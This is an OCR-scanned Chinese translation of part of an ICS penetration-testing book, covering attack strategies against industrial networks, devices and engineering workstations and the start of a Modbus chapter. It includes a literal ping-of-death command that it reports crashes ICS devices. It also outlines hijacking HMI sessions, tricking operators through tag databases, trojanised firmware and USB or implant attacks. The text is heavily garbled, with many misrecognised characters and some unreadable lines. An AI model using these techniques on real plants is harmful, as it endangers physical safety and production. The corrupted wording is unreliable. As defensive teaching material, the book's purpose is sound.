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双 宿主 网 络 能 够 绕 过 很 多 网 络 安全 防护 措施 ， 它 虽然 会 带 来 巨大 的 安全 风险 ， 但 仍然 是 一 种 普遍 的 做 法 。 针 对 不 同 规模 (从 只 有 单个 小 型 控制 网 络 的 公司 到 
拥有 超过 10，000 台 设备 的 公司 ) 的 工业 公司 ， 我 曾经 开展 了 大 量 评估 工作 或 者 说 是 渗透 测试 工作 。 在 每 次 评估 工作 中 几乎 总 能 发 现 双 宿主 主机 ， 甚 至 在 安全 架构 


设计 非常 出 色 的 公司 中 经 常 也 能 发 现 它 的 存在 。 很 多 工程 师 将 其 看 作 是 一 种 标准 做 法 而 非 安 全 问题 ， 因 为 他 们 经 常 使 用 双 宿 主 主 机 接受 来 自 人 机 界面 的 邮件 报 
警 ， 或 者 实现 从 业务 工作 站 到 工程 师 站 (通过 RDP) 的 便捷 访问 。 为 了 实现 同 数据 库 通 信 等 功能 ， 甚 至 有 部 分 厂商 仍然 建议 在 他 们 的 工控 系统 网 络 设计 中 使 用 双 


宿主 主机 。 
由 于 TCP 通 信 的 内 在 特点 ， 可 以 通过 “支持 ”会 话 从 而 使 得 攻击 者 获得 对 工控 系统 网 络 中 通信 系统 的 访问 权限 。 
- 由 于 通常 允许 采用 ICMP 协 议 的 通信 流量 通过 工控 系统 网 络 ， 这 也 为 攻击 者 使 用 ICMP 协 议 作 为 数据 通道 发 起 同 ICMP 相 关 的 攻击 创造 了 机 会 。 
除了 搜索 额外 信息 ， 例 如 帮助 获得 工控 系统 网 络 和 系统 访问 权限 的 认证 信息 ， 渗 透 策略 和 场景 也 应 包括 以 下 内 容 : 
对 网 络 流量 数据 进行 嗅 探 ， 查 找 工 控 系 统 相 关 的 认证 信息 与 协议 数据 〈 这 可 能 需要 在 交换 网 络 中 通过 中 间 人 攻击 来 实现 ) 。 


- 尝试 获取 工业 实时 历史 数据 库 和 标签 数据 库 服务 器 信息 的 访问 权限 ， 进 行 信息 搜集 并 可 能 获得 对 工控 系统 网 络 的 可 信访 问 权限 【一 些 设 备 甚至 可 以 直接 从 
标签 数据 库 进行 操作 ) 。 


党 试 获取 中 间 服 务 器 的 访问 权限 ， 例 如 标签 服务 器 、SCADA 服 务 器 和 应 用 服务 器 ， 以 动 持 或 自 改 人 机 界面 画面 与 设备 控制 。 


` 尝试 对 存在 漏洞 的 基于 Unix 和 Linux 系 统 的 设备 进行 汤 洞 利用 攻击 并 获取 其 控制 权 ， 例如 对 PLC、 网 络 模 块 、 工 业 交 换 机 、IP 网 关 等 设备 ， 尝 试 动 持 或 葡 改 
其 人 机 界面 表面 与 设备 控制 。 


. 尝试 获取 工程 师 站 的 访问 权限 并 窃取 其 中 存储 的 关键 信息 ， 以 及 尝试 通过 厂商 软件 、 设 备 Web 界 面 或 者 其 他 类 似 于 SSH 的 通信 协议 (很 可 能 是 通过 双 宿 主 主 
机 的 连接 ) 等 方式 获取 工作 站 的 访问 权限 进入 工控 系统 区 域 。 


- 尝试 入 侵 DMZ 区 中 的 终端 服务 器 和 瘦 客 户 端 。 
. 尝试 通过 ICMP、 已 知 工 控 系 统 协议 或 已 发 现 的 其 他 允许 通过 防火 墙 的 协议 (通过 网 络 噢 探 ) 对 流量 进行 隧道 封装 ， 从 而 进入 工控 系统 网 络 。 
. 检查 针对 工控 系统 网 络 的 LCMP 访 问 (本 章 后 文 将 讨论 针对 工控 系统 设备 的 [CMP DoS 攻 击 ) o 


利用 数据 通信 中 的 不 当 配 置 (使 用 MiTM 攻 击 ) ， 尝 试 通过 动 持 现 有 会 话 、“ 记 录 并 重 放 ” 或 者 自 履 动态 数据 等 方式 获取 工控 系统 区 域 的 访问 权限 (该 策略 
不 应 该 在 生产 系统 中 进行 尝试 ) 。 


+ 尝试 构造 数据 包 以 获得 工控 系统 的 访问 权限 和 (或 ) 控制 权限 (再 次 ， 这 一 策略 不 应 该 针对 生产 系统 进行 尝试 ) 。 


` 检查 允许 进入 工控 系统 网 络 的 公开 远程 访问 连接 ,例如 RDP 和 VNC。 


渗透 策略 的 制订 和 场景 的 构建 可 能 还 需要 取决 于 测试 规则 ,但 是 一 旦 在 工控 系统 网 络 边 界 开始 测试 就 必须 非常 谨慎 。 如 果 攻 击 过 于 频繁 ， 或 者 如 果 设 备 中 通 
过 的 流量 类 型 不 对 ， 就 可 能 会 对 生产 网 络 造 成 严重 的 负面 后 果 。 即 便 不 是 所 有 ， 最 起 码 也 应 该 是 大 多 数 的 攻击 都 应 在 测试 开发 环境 (或 复制 环境 ) 中 进行 ， 而 非 
在 生产 网 络 中 展开 。 


上 面 所 列 出 的 内 容 当 然 不 是 同 工 控 系统 环境 有 关 的 所 有 策略 与 威胁 向 量 的 全 面 列表 。 然 而 ， 上 述 策略 与 威胁 向 量 是 最 溃 见 的 ， 并 且 借 助 列表 中 提 及 的 策略 与 
威胁 向 量 ， 我 们 已 经 取得 了 重大 成 功 。 (第 3 章 对 威胁 向 量 进行 了 更 全 面 的 介绍 ， 第 5 章 到 第 7 章 涵盖 了 实施 这 些 攻击 的 众多 技术 。) 工控 系统 渗透 测试 团队 必须 依 
据 于 他 们 在 工业 控制 系统 领域 的 经 验 与 知识 ， 才 能 制订 出 基于 现实 的 、 可 行 的 工控 系统 风险 场景 的 综合 策略 。 工 控 系统 的 风险 情况 和 威胁 向 量 的 详细 列表 可 以 在 
Eric D.KnappSJoel Thomas Langhil 编 写 的 《Industrial Network Security (第 二 版 ) 》 (Syngress, 2011) 一 书 以 及 NIST SP800-82 措 南 中 找到 |。 
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为 了 充分 利用 并 正确 执行 上 述 策 略 ， 测 试 人 员 不 仅 需 要 依靠 现 有 的 渗透 测试 技术 和 工控 系统 经 验 ， 而 且 还 需要 利用 从 厂商 和 互联 网 中 获取 知识 与 资源 。 最 娴 
熟 、 最 成 功 的 测试 人 员 和 攻击 者 都 能 够 利用 关于 工控 系统 架构 、 设 计 、 协 议 细节 、 通 信 、 命 令 等 大 量 信 息 来 构造 最 聪明 、 最 实用 的 攻击 。 正 是 技术 与 丰富 资源 的 
这 种 结合 ， 造 成 了 随机 攻击 与 有 针对 性 攻击 之 间 的 诸多 差异 。 


4.7.4 ”网 络 之 外 的 考虑 : 非 对 称 与 可 办 换 的 攻击 同 量 


当 制 订 攻 击 策 略 或 者 考虑 防御 对 策 时 ， 重 要 的 是 不 能 仪 仅 关注 显而易见 的 攻击 向 量 ， 还 需要 考虑 到 互联 网 以 及 邻接 网 络 。 其 他 攻击 向 量 ,例如 物理 弱点 以 及 
社会 工程 学 也 能 够 作为 针对 工控 系统 的 额外 攻击 向 量 。 借 助 这 些 攻击 向 量 的 测试 通常 也 称 之 为 红 队 测 试 (red team testing) 。 昌 然 对 围绕 后 面 提 及 的 额外 攻击 
向 量 的 具体 技术 细节 的 介绍 超出 了 本 书 的 范畴 ， 但 是 当 针 对 工控 系统 进行 渗透 测试 时 应 当 考 虑 如 下 攻击 向 量 : 


物理 访问 ”全 面 的 红 队 测试 ， 也 包含 了 物理 攻击 向 量 ， 即 对 亲自 、 现 场 近 距离 获取 工控 系统 环境 访问 权限 的 威胁 进行 模拟 。 其 中 包括 了 传统 的 “非法 侵 


X AK, Awki ARE ARR ERIE. 


:无线 WiFi 及 其 他 无 线 电 通信 技术 ， 例 如 ZigBee， 都 是 攻击 者 可 以 用 来 获取 工控 系统 访问 权限 的 攻击 向 量 。 有 很 多 关于 WiFi 攻 击 的 图 书 和 出 版 物 ， 可 以 用 
Google 搜 索 关键 字 “ZigBee hacking” 获 取 大 量 信息 ， 甚 至 还 有 攻击 ZigBee 以 及 其 他 工业 无 线 电 设备 的 指南 说 明 。 
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正如 本 章 前 面 案 例 研 究 中 所 详细 讨论 的 ， 当 攻击 者 能 够 现场 访问 工控 系统 设备 时 ， 攻 击 者 采用 的 主要 策略 是 植 入 有 助 于 攻击 进一步 展开 的 设备 ,例如 流 谍 
WiFi 接 入 点 、 感 染 介质 、“ 自 动 故障 申报 ”设备 以 及 诸如 Kali Linux ISO of Doom”! (https://www.offensive-security.com/kali-linux/kali-linux-iso-of-doom/) 的 攻击 指 
控 系统 (“C2 ) 等 。 虽 然 流 谍 设 备 从 来 都 不 应 该 部 署 在 工控 系统 生产 环境 中 ,但 当 这 种 做 法 在 菜 些 情况 下 不 会 对 工控 系统 环境 造成 危害 时 ， 就 可 以 考虑 该 策 
WA 


社会 工程 学 ”社会 工程 学 利用 了 所 有 安全 项 目 中 最 为 薄弱 的 环节 之 一 ， 即 人 的 因素 。 使 用 “技术 型 ”社会 工程 学 方法 ， 例 如 鱼 又 式 钓鱼 、 社 交 媒 体 、 以 及 


将 感染 的 社交 媒体 同 特 定 工具 相 绑 定 ， 这 些 工具 包括 社会 工程 学 工具 集 (SET) (https://www.trustedsec.com/social-engineer-toolkit/ ， 也 包含 在 Kali Linux?) 、 浏 


x 


Ye S mA] AER (BeEF) (http://beefproject.com/) ~ USB Rubber Ducky (http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe?variant=35337864) VA 
及 BadUSB (http://null-byte.wonderhowto.com/how-to/make-your-own-bad-usb-0165419/) 等 ， 这 些 方法 能 够 帮助 渗透 测试 团队 对 当前 威胁 所 使 用 的 最 有 效 的 攻击 向 


量 进 行 测试 。 
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让 一 个 不 知情 的 用 户 使 用 一 个 带 有 恶意 代码 的 USB 存 储 介 质 是 攻击 者 进入 物理 隔离 系统 的 常用 策略 ， 详 见 Stuxnet (http://www.cnet.com/news/stuxnet-delivered- 


to-iranian-nuclear-plant-on-thumb-drive/) 。 


借助 社会 工程 学 ， 内 部 人 员 及 植 入 设备 将 使 得 聚焦 于 边界 的 “分 层 防 御 ” (Layered defense) 作用 大 大 降低 。“ 分 层 防御 ”的 部 署 实施 必须 非常 全 面 ， 需 要 
包含 诸如 网 络 和 入 侵 监 控 、 终 端 保护 及 针对 社会 工程 威胁 的 安全 意识 培训 等 要 素 。 


4.7.5 ”内 部 测试 : 针对 工控 系统 网 络 的 测试 


现在 到 这 儿 了 ， 这 个 阶段 是 一 个 比较 烧 钱 的 阶段 。 从 这 里 开始 ， 所 有 内 容 都 试图 以 某 种 方式 控制 或 者 影响 工控 系统 的 过 程 ， 对 功能 安全 和 生产 这 来 风险 。 
(当然 ， 这 些 都 是 在 实验 室 或 者 测试 开 友 环境 中 演示 的 ， 而 非 生产 系统 。 ) 


我 们 在 此 处 进行 的 测试 ， 就 好 像 攻 击 者 已 经 在 工控 系统 网 络 中 一 样 。 如 果 脆 弱 性 暴露 在 邻接 网 络 中 ， 那 么 就 不 建议 通过 跳板 进入 生产 工控 系统 。 此 阶段 中 ， 
不 说 全 部 、 起 码 也 是 大 多 数 的 策略 和 技术 应 该 在 实验 环境 或 者 测试 开发 网 络 中 使 用 ， 其 中 测试 开 友 网 络 要 能 够 对 实际 生产 系统 进行 最 准确 的 仿真 。 当 然 了 ， 也 并 
不 需要 完全 一 样 。 只 要 对 每 种 类 型 的 设备 、 服 务 器 、 工 作 站 、 配 置 以 及 版 本 ( 尽 可 能 多 ) 的 采样 样本 进行 测试 ， 束 可 以 实现 对 工控 系统 中 可 利用 风险 的 合理 刻 
画 ， 从 而 结束 测试 过 程 。 达 到 这 一 效果 的 最 好 方式 之 一 ， 除 了 采用 包含 各 种 类 型 、 模 型 、 版 本 的 实际 设备 ， 还 可 以 通过 服务 器 以 及 工作 站 的 虚拟 化 来 实现 ， 正 如 
之 前 在 “虚拟 化 ”一 节 中 所 讨论 的 那样 。 最 好 从 构建 测试 开发 网 络 开始 ， 然 后 从 该 测试 开发 网 络 继续 开展 后 续 的 工作 。 


在 策略 的 下 一 步 工作 中 ， 部 分 要 点 如 下 所 示 : 
. 这 一 阶段 通常 假设 攻击 者 已 经 进入 工控 系统 网 络 或 者 存在 内 部 威胁 (包括 恶意 介质 ) 。 


+ 现在 比 以 往 任 何 时 候 都 更 加 关注 验证 (或 挖 据 ) 漏洞 和 漏洞 利用 工具 ， 正 是 因为 它们 给 功能 安全 和 生产 带 来 了 有 效 和 具有 针对 性 的 风险 〈 履 盖 或 变更 安全 
逻辑 ， 蔡 用 关键 控制 措施 等 等 ) 。 


` 我 们 强烈 推荐 使 用 以 下 策略 进行 0-day 漏 洞 挖掘 ， 因 为 大 量 工控 系统 设备 漏洞 并 未 报 送 至 ICS-CERT， 或 者 还 未 被 发 现 。 


理解 下 面 提 出 的 策略 并 不 适用 于 直接 开展 攻击 (由 来 自 互 联网 和 邻接 网 络 的 攻击 者 人 工友 起 的 攻击 ) 非常 重要 。 当 前 恶意 代码 活动 正 试图 在 恶意 代码 和 高 级 
寺 续 性 威胁 (APT) 中 采用 相同 的 策略 。 因 此 ， 渗 透 测试 策略 以 及 防御 集 略 不 应 该 仅仅 考虑 来 自 互 联网 和 邻接 网 络 的 攻击 场景 ， 还 应 该 考虑 直接 源 自 于 内 部 的 攻 
击 场景 。 除 了 由 心怀 不 满 的 员工 或 者 潜入 的 卧底 等 真正 的 内 部 人 员 来 植 入 恶意 代码 ， 有 恶意 代码 也 可 以 直接 源 自 于 工控 系统 网 络 内 部 ， 例 如 通过 被 感染 的 USB 设 备 
摆渡 进入 工控 系统 网 络 。 有 恶意 代码 可 能 借助 社会 工程 学 在 不 经 意 间 从 社交 媒体 复制 到 了 USB 设 备 之 中 。 某 个 被 感染 的 USB 设 备 可 能 恰巧 掉 在 了 一 个 合适 的 地 方 ， 
并 正好 被 一 个 不 知情 的 工程 师 捡 了 起 来 ;或 者 厂商 的 应 用 程序 或 者 某 个 版 本 的 固件 已 经 被 “木马 化 ”并 在 供应 链 中 进行 感染 。 研 究 渗透 测试 策略 的 天 键 在 于 要 有 
创造 性 并 进行 综合 考虑 ， 想 尽 一 切 办 法 ， 像 攻击 者 一 样 思考 。 
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随后 针对 工控 系统 设备 、 服 务 器 和 工作 站 的 渗透 测试 方法 和 策略 既 可 以 从 互联 网 内 部 也 可 以 从 互联 网 外 部 应 用 于 面向 互联 网 的 设备 。 当 对 生产 系统 进行 测试 
时 要 尤其 小 心 ! 如 前 所 述 ， 针 对 生产 工控 系统 的 主动 渗透 测试 会 对 功能 安全 与 生产 造成 不 利 影响 。 强 烈 建议 在 实验 环境 或 者 测试 开发 环境 中 对 工业 控制 系统 和 设 


备 进行 主动 渗透 测试 。 
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1. 工 控 系 统 设 备 的 渗透 测试 策略 


对 于 影响 最 大 的 威 肋 ， 其 终极 目标 是 实现 对 运营 技术 (OT) 设备 的 控制 ， 或 者 破坏 运营 技术 设备 。 遗 憾 的 是 ， 对 于 资产 所 有 者 而 言 ， 由 于 在 设备 设计 之 初 并 
未 考虑 安全 问题 ， 因 此 使 这 些 设备 执行 设计 功能 之 外 的 操作 并 不 是 很 困难 的 事 。 例 如 ， 网 络 堆栈 通常 无 法 处 理 异常 流量 (000, BARGES. Ade, BS 
只 是 同 设备 某 一 功能 不 一 致 的 常规 数据 包 ) 。 设 备 的 其 他 硬件 组 件 的 载荷 阀 值 也 是 有 限 的 ， 可 以 对 这 些 冰 值 加 以 利用 ， 例 如 生成 能 够 导致 处 理 器 利用 率 严 升 的 负 
载 。 业 界 已 经 知道 类 似 的 场景 会 导致 设备 运行 异常 、 重 置 以 及 出 现 故 障 。 例 如 ， 一 条 简单 的 对 ICM P 协 议 进行 操作 的 命令 行 命 令 ， 就 会 对 绝 大 多 数 工 控 系 统 设 备 造 
成 不 民 影 响 : 


root@kali:~# ping -s 65535 192.168.50.127 


是 的 ， 这 就 是 从 20 世 纪 90 年 代 就 非常 著名 的 (或 者 说 是 声名 狼藉 的 ) 死亡 之 ping (Ping of Death) 。 对 于 那些 不 熟悉 死亡 之 ping 的 人 们 来 说 ， 该 命令 只 是 
目标 发 送 一 个 65535 字 节 的 大 型 ping 请 求 数据 包 。 对 于 所 有 现代 、 常 见 的 业务 IT 系 统 和 应 用 程序 而 言 ， 这 样 的 数据 包 实 际 上 并 不 会 造成 危害 ， 但 它 会 给 工控 系统 
设备 市 来 麻烦 。 许 多 1DS 设 备 的 网 络 堆栈 在 设计 之 初 也 没有 考虑 超 长 数据 包 ， 残 像 以 前 的 老式 IT 系 统一 样 。 当 这 些 设备 接收 数据 包 并 对 数据 包 进 行 重组 时 ， 由 于 内 
人 存 或 者 缓存 区 溢出 可 能 会 导致 设备 “ 朋 溃 ”。 令 人 惊讶 的 是 ， 对 于 当前 刚 从 包装 箱 中 拿 出 来 的 更 新 了 固件 的 全 新 设备 而 言 ， 这 种 “攻击 ”仍然 奏效 。 在 近年 的 几 
个 国际 会 议 (都 是 关于 工业 安全 和 常见 网 络 安全 主题 的 会 议 ) 中 ,包括 Black Hat2015， 我 向 几 个 工控 系统 厂商 演示 了 这 条 命令 如 何 影响 他 们 的 设备 。 几 乎 在 所 有 
演示 中 ， 该 命令 都 至 少 会 造成 设备 停止 响应 直到 攻击 停止 。 在 部 分 演示 中 ， 会 造成 设备 重 置 。 还 有 一 些 演示 ， 则 造成 了 设备 故障 ， 需 要 手动 重 置 。 因 此 ， 只 向 工 
控 系 统 设 备 上 帮 送 ICMP 请 求 是 不 安全 的 ， 这 是 从 上 述 演示 中 学 习 到 的 一 个 重要 教训 。 


下 面 进 一 步 从 安全 角度 来 看 一 些 更 复杂 的 情况 ， 大 多 数 工业 协议 都 以 IP 协 议 为 基础 ， 而 使 用 这 些 工业 协议 的 设备 同样 非常 脆弱 。 由 于 很 多 协议 中 没有 使 用 加 
密 机 制 ， 甚 至 没有 使 用 认证 机 制 ， 导 致 这 些 协议 非常 容易 被 自 改 、 动 持 ， 甚 至 会 从 头 开始 构 造 这 些 协议 的 数据 包 ， 从 而 对 工控 系统 设备 进行 操作 、 破 坏 ， 甚 至 控 
制 这 些 工控 系统 设备 。 


当 在 实验 环境 或 者 测试 开发 环境 中 对 工控 系统 设备 进行 渗透 测试 时 ， 应 当 考 虑 以 下 策略 (这 些 方法 和 技术 将 会 在 第 5 章 和 第 6 章 详细 介绍 ) : 
` 通过 数据 包 构 造 与 模糊 测试 方法 测试 设备 的 健壮 性 。 

- 使 用 Netcat、hping3、Nping 以 及 Scapy 工 具 构造 畸形 数据 包 。 

` 使 用 包含 DoS 扫描 模块 的 漏洞 扫描 工具 对 设备 进行 测试 ， 例 如 Nessus、Nexpose 

` 使 用 能 够 测试 大 量变 异 数据 的 模糊 测试 工具 〈 如 Peach Fuzzer) ， 当 需要 时 自动 重 置 设备 并 对 测试 结果 进行 记录 

` 通过 中 间 人 攻击 (MiTM) 进行 流量 嗅 探 、 尝 斌 “记录 和 回放 ”以 及 自 改 动态 控制 数据 。 


` 对 厂商 的 远程 通信 和 工程 应 用 程序 进行 测试 ， 查 找 逻 辑 漏洞 、 绕 过 身份 验证 ， 并 且 对 其 功能 进行 分 析 。 


O- 


通常 可 以 从 厂商 的 网 站 中 免费 获得 用 于 同 设备 进行 通信 并 对 设备 编程 的 应 用 程序 。 直 接 使 用 这 些 应 用 程序 通常 是 最 简单 的 攻击 向 量 之 一 ， 因 为 它们 在 同 设备 
通信 时 通常 不 进行 身份 验证 。 在 很 多 情况 下 ， 即 使 这 些 应 用 程序 确实 要 求 了 身份 认证 ， 涂 透 测 试 人 员 也 可 以 利用 软件 中 包含 的 逻辑 缺陷 或 漏洞 绕 过 认证 。 最 后 ， 
对 软件 和 (或 ) 设备 的 通信 过 程 进 行 逆向 分 析 ， 利 用 软件 自身 功能 开发 定制 的 漏洞 利用 工具 或 者 构造 自 定义 的 数据 包 也 可 以 发 起 攻击 。 


- 搜索 允许 任意 代码 执行 和 对 设备 进行 未 授权 控制 的 已 知 漏洞 和 0-day 漏 洞 。 
. 尝试 对 CVE 或 1CS-CERT 公 告 中 公布 的 已 知 漏洞 进行 漏洞 利用 


` 尝试 入 侵 搭 载 过 时 且 脆 弱 的 操作 系统 的 设备 和 模块 (研究 人 员 Eric Forner 和 Btian Meixell 在 Black Hat2013 大 会 上 展示 了 这 种 类 型 的 工 


FL, https://www.youtube.com/watch?v=UwHtR2DCN5U) 
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了 解 漏洞 公告 ! 对 漏洞 公告 进行 研究 和 分 析 ， 如 ICS-CERT， 不 仅 可 以 了 解 当 前 存在 哪些 漏洞 ， 还 可 以 了 解 可 能 存在 哪 种 类 型 但 还 没有 发 现 的 漏洞 。 
" 对 厂商 所 提供 的 用 于 同 设备 进行 通信 的 应 用 程序 进行 逆向 分 析 、 模 糊 测试 以 及 脆弱 性 研究 

. 对 固件 进行 逆向 分 析 ， 时 找 硬 编 码 的 证 书 和 私 钥 ( 这 并 非 不 常见 ) 、 后 门 ， 以 及 0-day 漏 洞 (编码 错误 ) 等 

` 尝试 打造 “木马 化 ”的 恶意 固件 ， 设 备 可 以 下 载 并 接收 这 些 固件 


2. 工 控 系 统 服务 器 和 工作 站 的 渗透 测试 策略 


当前 绝 大 多 数 工 控 系 统 服务 器 和 工作 站 都 是 基于 Windows 操 作 系统 的 ; 然而 ， 还 有 零散 的 几 种 服务 器 和 工作 站 仍然 基于 Unix 或 Linux 操 作 系 统 。 无 论 使 用 何 
种 操作 系统 ， 针 对 工控 系统 服务 器 或 工作 站 的 漏洞 利用 同 针对 传统 业务 盯 系 统 的 漏洞 利用 并 没有 什么 不 同 。 然 而 ， 考 虑 到 有 限 的 可 用 补丁 ， 以 及 老式 系统 服役 周 
期 的 延长 ， 工 控 系 统 世界 中 还 存在 一 个 更 大 的 安全 隐患 。 众 所 周知 ， 过 时 并 且 未 打 补 本 的 Windows 版 本 是 很 不 安全 的 ， 然 而 直到 今天 ， 我 们 还 能 看 到 即便 是 
Windows XP 工 作 站 也 还 仍 在 生产 系统 中 服役 。 昌 然 借 助 这 些 系统 得 以 部 署 成 熟 的 渗透 测试 环境 ， 但 是 这 也 意味 着 包含 大 量 攻 击 目标 对 象 的 环境 面临 着 现实 世界 
中 的 威胁 ， 这 对 资产 所 有 者 来 说 是 个 严峻 的 问题 。 
虽然 针对 业务 IT 系统 的 渗透 测试 技术 和 方法 同样 适用 于 工控 系统 服务 器 和 工作 站 ， 但 是 当 对 工控 系统 进行 渗透 测试 时 ， 应 该 考虑 以 下 针对 工控 系统 的 策略 
(这 些 方法 和 技术 将 会 在 以 后 的 章节 中 详细 讨论 ) : 
- 尝试 入 侵 SCADA 服 务 器 (例如 ， 应 用 服务 器 、 标 签 数据 库 ) ， 以 拦截 、 控 制 以 及 欺骗 返回 人 机 界面 的 数据 。 
` 使 用 中 间 人 攻击 (MiTM) 尝试 动 持 工控 系统 设备 的 控制 并 欺骗 返回 人 机 界面 的 数据 。 
- 攻击 标签 数据 库 ， 使 操作 人 员 在 不 经 意 间 执行 威胁 安全 的 操作 (例如 ， 关 闭 一 个 已 经 压力 过 大 的 管道 阀门 而 不 是 打开 它 ) 。 
. 通过 搜索 认证 信息 或 者 改变 设备 逻辑 的 方式 入 侵 工 程 师 站 。 
- 尝试 对 CVE 或 ICS-CERT 公 告 中 公布 的 已 知 漏洞 进行 漏洞 利用 (正如 我 们 提 到 的 ， 请 了 解 并 研究 ICS-CERT 公 告 ) 。 


. 对 厂商 的 应 用 程序 进行 逆向 分 析 ， 挖 握 其 中 的 0-day 漏 洞 或 者 复 现 其 功能 来 构造 更 加 精巧 的 攻击 。 


[1] «Google Hacking 技术 手册 》， 该 书 已 由 机 械 工 业 出 版 社 出 版 。) 一 译 者 注 
[2] Kali Linux ISO of Doom 的 思路 是 构建 一 个 “无 人 值守 的 自我 部 署 ” 的 Kali Linux 实例 ， 能 够 在 无 需 用 户 输入 的 情况 下 ， 按 照 定制 配置 将 系统 安装 到 目标 机 器 上 。 
完成 重启 之 后 ，Kali 使 用 反 向 OpenVPN 连接 回 连 到 攻击 者 。VPN 的 建立 使 得 攻击 者 在 远程 网 络 与 本 地 网 络 之 间架 起 了 一 座 桥 梁 ， 同 时 攻击 者 能 够 获取 目 
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标 网 络 中 的 整套 渗透 测试 工具 。 
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手把手 地 讲述 整个 渗透 测试 项 目的 测试 细节 对 于 像 本 草 这 样 的 单独 章节 而 言 内 容 有 点 过 多 ， 所 以 我 们 主要 关注 于 如 何 从 较 高 的 层次 来 看 在 工控 系统 环境 中 进 
行 渗透 测试 时 应 该 考虑 的 方法 和 策略 。 本 章 提供 的 信息 不 仪 应 被 视 为 渗透 测试 的 策略 指南 ， 而 县 还 可 以 帮助 资产 所 有 者 在 考虑 制订 防御 策略 和 风险 缓解 策略 时 ， 
迅速 形成 针对 工控 系统 的 关于 威胁 、 攻 击 和 风险 等 内 容 的 概念 。 


最 后 ， 以 下 是 在 构建 、 管 理 或 者 聘用 渗透 测试 团队 时 应 当 考 虑 的 几 个 关键 要 点 : 
- 确保 渗透 测试 人 员 具 备 传统 渗透 测试 技术 和 策略 所 要 求 的 相关 技能 。 
. 对 于 工控 系统 渗透 测试 而 言 ， 确 保 测 试 人 员 对 工控 系统 、 设 备 和 应 用 程序 有 着 透彻 的 了 解 。 
` 制订 明确 的 测试 规则 ， 避 免 对 生产 系统 应 用 主动 的 、 可 能 造成 危害 的 渗透 测试 技术 。 
- 聘用 工控 系统 工程 师 作 为 主题 专家 (Subject Matter Expert, SME) 。 
-了解 系统 当前 和 未 来 所 面临 的 威胁 和 风险 ， 了 解 、 研 究 现 有 的 工控 系统 漏洞 ， 跟 踪 了 解 和 研究 工控 系统 恶意 代码 的 发 展 趋势 和 技术 。 
对 特定 系统 开展 0-day 漏 洞 研究 。 (不 要 仅仅 依赖 咨询 服务 和 信息 共享 和 分 析 中 心 ASAC) 作为 确定 的 信息 来 源 。) 


| 确保 攻击 场景 和 结果 能 够 展现 工控 系统 中 具有 针对 性 、 真 实 、 确 实 存 在 的 风险 。 (例如 ， 对 于 安全 、 生 产 和 公司 声誉 方面 的 风险 ) 。 


4.9 ”延伸 阅读 


: 渗透 测试 基础 : 

OSCP certification (Offensive-Security.com) 

CEH/ECSA certifications (EC-Council) 

GPEN certification (GIAC/SANS) 

The Hacking Exposed book series (McGraw Hill Professional) 
e GICSP certification (GIAC/SANS) 


e Industrial Network Security, Second Edition, by Eric D. Knapp and Joel Thomas 
Langhill (Syngress, 2011) 


e Cybersecurity for Industrial Control Systems, by Tyson Macaulay and Bryan L. 
Singer (Auerbach Publications, 2011) 


。 FRB AMA : 


e OSCE, OSEE certifications (Offensive-Security.com) 
e GXPN certification (GIAC/SANS) 


e PentesterAcademy.com (comprehensive from basic to advanced) 


/Offensive ComputerSecurity/lectures. html) 
e The Shellcoder’s Handbook, by Chris Anley and John Heasman (Wiley, 2007) 


e Gray Hat Python (No Starch Press, 2009) and Black Hat Python (No Starch Press, 
2014), by Justin Seitz 
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随 着 时 间 的 推移 ， 从 搜集 远程 设备 信息 的 简单 网 络 到 内 置 见 余 设 备 的 复杂 系统 网 络 ， 工 业 协 议 的 发 展 进程 从 未 停 软 ， 而 且 工 控 系 统 内 部 所 使 用 的 协议 有 时 只 
是 针对 某 个 特定 的 应 用 程序 。 多 年 来 ， 众 多 标准 化 组 织 (WIEC, ISO. ANIE) 都 致力 于 工控 协议 的 标准 化 工作 。 与 此 同时 ， 大 量 专 有 协议 也 应 运 而 生 。 在 大 多 
数 情况 下 ， 专 有 协议 由 厂家 设计 开发 ， 并 结合 特定 的 软 硬 件 构 建 以 厂商 为 中 心 的 系统 。 不 论 协 议 的 起 源 是 哪里 ， 大 多 数 工 业 协议 都 有 一 个 共同 点 ， 那 就 是 这 些 协 
议 在 设计 之 初 都 没有 考虑 到 随 之 而 来 的 安全 问题 ， 因 此 这 些 协议 与 生 俱 来 束 不 安全 。 正 如 读者 将 要 在 本 章 中 所 看 到 的 ， 自 从 工业 协议 与 | 网络 相 融合 以 及 主流 工 
业 协 议 开 始 基于 TCP/IP 协 议 构建 以 来 ， 安 全 性 就 成 为 了 一 个 重要 的 问题 。 而 理解 这 些 安全 方面 的 缺陷 以 及 如 何 利 用 这 些 缺陷 ， 对 于 工控 系统 环境 的 渗透 测试 和 威 
胁 建 模 来 说 至 关 重 要 。 为 了 了 解 针对 部 分 广泛 使 用 的 工业 协议 的 常见 攻击 方法 以 及 相应 的 对 抗 措施 ， 本 章 将 对 相关 的 基础 知识 进行 介绍 。 


© 
©... 


本 章 提 供 的 所 有 第 三 方 代码 示例 和 脚本 ， 均 获得 了 GNU GPL 版 本 2 与 版 本 3 中 的 通用 许可 。 当 授权 不 明确 或 者 代码 示例 很 长 ， 抑 或 是 需要 进行 二 进 制 编译 时 ， 
我 们 将 提供 相关 项 目的 URL 链 接 。 
5.1 Modbus 协 议 


Modicon 公 司 (Schneider Electric 公 司 的 前 身 ) 在 70 年 代 末 设计 出 了 用 在 可 编程 序 控制 器 (PLC) 上 的 串 行 通信 协议 Modbus。Modbus 协 议 以 其 简单 、 健 
壮 、 开 放 而 且 不 需要 任何 特许 授权 的 特点 ， 成 为 了 最 通用 的 工控 系统 协议 。 自 从 Modbus 协 议 出 现 以 来 ， 工 控 协 议 都 进行 了 修改 来 适应 以 太 网 的 工作 环境 。 为 了 


做 到 这 一 点 ， 串 行 协 议 被 封装 (实际 上 是 “包装 ”) 在 TCP 首 部 ， 并 且 默 认 情 况 下 通过 以 太 网 TCP 协 议 的 502 问 口 进行 传输 。 由 于 Modbus 协 议 使 用 简单 ， 因 此 从 
工厂 到 变电站 等 多 种 设施 中 都 在 应 用 该 协议 。 


Modbus 协 议 的 数据 包 帧 由 两 部 分 组 成 : 应 用 数据 单元 (Application Data Unit, ADU) 和 协议 数据 单元 (Protocol Data Unit, PDU) 。 应 用 数据 单元 由 
地 址 域 、 协 议 数据 单元 和 差错 校 验方 法 组 成 。 协 议 数据 单元 由 功能 码 和 Modbus 帧 中 的 数据 部 分 组 成 。 图 5-1 是 基本 的 Modbus 串 行 协 议 实 例 ， 也 被 称 之 为 
Modbus RTU。 


A HEN 


图 5-1 Modbus 协议 


